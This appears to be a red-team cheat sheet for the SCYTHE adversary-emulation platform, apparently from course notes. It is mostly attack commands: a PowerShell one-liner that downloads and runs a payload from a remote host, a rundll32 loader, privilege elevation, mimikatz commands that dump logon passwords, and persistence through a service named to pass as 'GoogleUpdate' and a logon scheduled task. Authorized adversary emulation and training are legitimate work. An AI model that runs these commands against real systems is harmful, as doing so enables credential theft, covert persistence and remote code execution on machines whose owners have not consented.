SCYTHE
Login to your SCYTHE instance via web browser. Default port is 8443.
Campaign Manager - New Campaign
Select the following options:
- Name: unique name for the campaign
- Target Operating System: Windows, Linux, or macOS
- Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
- Communication Module:
- HTTPS is default,
- DNS, HTTP, and Stego require relays to be installed on redirector
- Google Sheet and Twitter require third party account/API
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import

Migrate Threats
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat
Download the binary to the target system and execute by double clicking.
Download DLL file from SCYTHE and execute below from a cmd.exe:
rundll32.exe ServiceLogin.dll,PlatformClientMain
Open a powershell.exe and run:
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;
loader --load run
run whoami
run cmd /c whoami
loader --load-runtime python3
list modules
loader --load "modulename"
"modulename"
Move file to virtual file system
loader --load downloader
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll
loader --load elevate
elevate --prompt
loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords
loader --load persist
Synatax:
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe
schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"
run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe
controller --shutdown
Last modified 2yr ago